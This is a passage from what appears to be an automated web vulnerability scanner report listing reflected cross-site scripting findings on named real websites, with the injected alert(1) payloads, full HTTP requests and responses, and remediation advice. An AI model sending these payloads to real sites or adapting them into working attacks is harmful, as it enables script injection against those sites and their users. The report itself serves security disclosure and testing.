HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 21:18:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 427
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title>www.rbisaleschallenge.com</title>
</head> <frameset rows="100%,*" bor ...[SNIP]... <frame src="http://rbisaleschallenge.wpunj.edu/?d0eeb"><script>alert(1)</script>02fed4cc8e9=1" frameborder="0" /> ...[SNIP]...
1.373. http://www.rbisaleschallenge.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rbisaleschallenge.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a69"><script>alert(1)</script>afb96244eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?53a69"><script>alert(1)</script>afb96244eb5=1 HTTP/1.1 Host: www.rbisaleschallenge.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 21:17:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 438
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title>www.rbisaleschallenge.com</title>
</head> <frameset rows="100%,*" bor ...[SNIP]... <frame src="http://rbisaleschallenge.wpunj.edu/favicon.ico?53a69"><script>alert(1)</script>afb96244eb5=1" frameborder="0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d34'-alert(1)-'e12bb55d977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.375. http://www.rightnow.com/company-contact.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/company-contact.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f9d'-alert(1)-'531b674974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20623'-alert(1)-'468b397d330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.html20623'-alert(1)-'468b397d330 HTTP/1.1 Host: www.rightnow.com Proxy-Connection: keep-alive Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 31 Aug 2011 18:15:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 38684
1.377. http://www.rightnow.com/cx.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/cx.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa271'-alert(1)-'eab22d1b281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.html?fa271'-alert(1)-'eab22d1b281=1 HTTP/1.1 Host: www.rightnow.com Proxy-Connection: keep-alive Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58a7'-alert(1)-'e244cb60cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.phpd58a7'-alert(1)-'e244cb60cfb HTTP/1.1 Host: www.rightnow.com Proxy-Connection: keep-alive Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 31 Aug 2011 18:15:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 38683
1.379. http://www.rightnow.com/cx.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/cx.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dfa'-alert(1)-'b945d6d6f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.php?13dfa'-alert(1)-'b945d6d6f74=1 HTTP/1.1 Host: www.rightnow.com Proxy-Connection: keep-alive Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e25'-alert(1)-'79fc9cf9e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.icoc7e25'-alert(1)-'79fc9cf9e4a HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/) Host: www.rightnow.com Proxy-Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found Date: Wed, 31 Aug 2011 18:15:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 38609
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6679'-alert(1)-'58fa45e0a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfe4'-alert(1)-'603995fd0d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be2c8'-alert(1)-'e0337fe94ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebdea'-alert(1)-'da2dd0d86eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e759a'-alert(1)-'5ea9d5a4cb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a72b2'-alert(1)-'fc5f88b9e75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ccba'-alert(1)-'19306ec160d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 215d1'-alert(1)-'360df0dd7fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e75a1'-alert(1)-'1dafc8057a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 811b9'-alert(1)-'6a55d50ed35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36081'-alert(1)-'cf2eb8cd43c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37356'-alert(1)-'f2a926604f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.393. http://www.rightnow.com/javascript/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/floatbox/floatbox.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9ba9'-alert(1)-'a3061f6490a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b27'-alert(1)-'d42ec4174bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e26f2'-alert(1)-'ac9e6d2d317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add9f'-alert(1)-'184d0a8c26f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.397. http://www.rightnow.com/javascript/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/floatbox/floatbox.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a00e9'-alert(1)-'1e361830eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7146'-alert(1)-'b47c019bbba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f14c3'-alert(1)-'4fea86764d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7cf'-alert(1)-'91c57ac54d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.401. http://www.rightnow.com/javascript/floatbox/options.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/floatbox/options.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f994b'-alert(1)-'7f5fbe479da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c525'-alert(1)-'f85878e1394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbab8'-alert(1)-'4bb75d35616 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.404. http://www.rightnow.com/javascript/form.110610.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/form.110610.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c707a'-alert(1)-'805892914ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0a9'-alert(1)-'5e2ee8acf95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9497f'-alert(1)-'cbe91a86368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8a75'-alert(1)-'87f281d61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42cc8'-alert(1)-'b4ca22a382e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 994ac'-alert(1)-'85e529bbe1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf90d'-alert(1)-'9266a2a23e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 562ae'-alert(1)-'040b828313e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b94'-alert(1)-'0069db6cb1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bfd8'-alert(1)-'ba7f15548b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e2d'-alert(1)-'cd0cf84d869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f66a'-alert(1)-'3ec72f2288e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82cb2'-alert(1)-'2f5e1b427b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51c9b'-alert(1)-'2d75c23b47b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.418. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a2e'-alert(1)-'1de2dab2528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f787'-alert(1)-'ef6b2446d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7494'-alert(1)-'68ed11db77c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9ea'-alert(1)-'0a284f6c62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.422. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63488'-alert(1)-'17302e9ed49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6735c'-alert(1)-'03965d14717 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8aaf'-alert(1)-'89ee7162aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa57'-alert(1)-'42be76e26c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.426. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [name of an arbitrarily supplied request parameter]previousnext
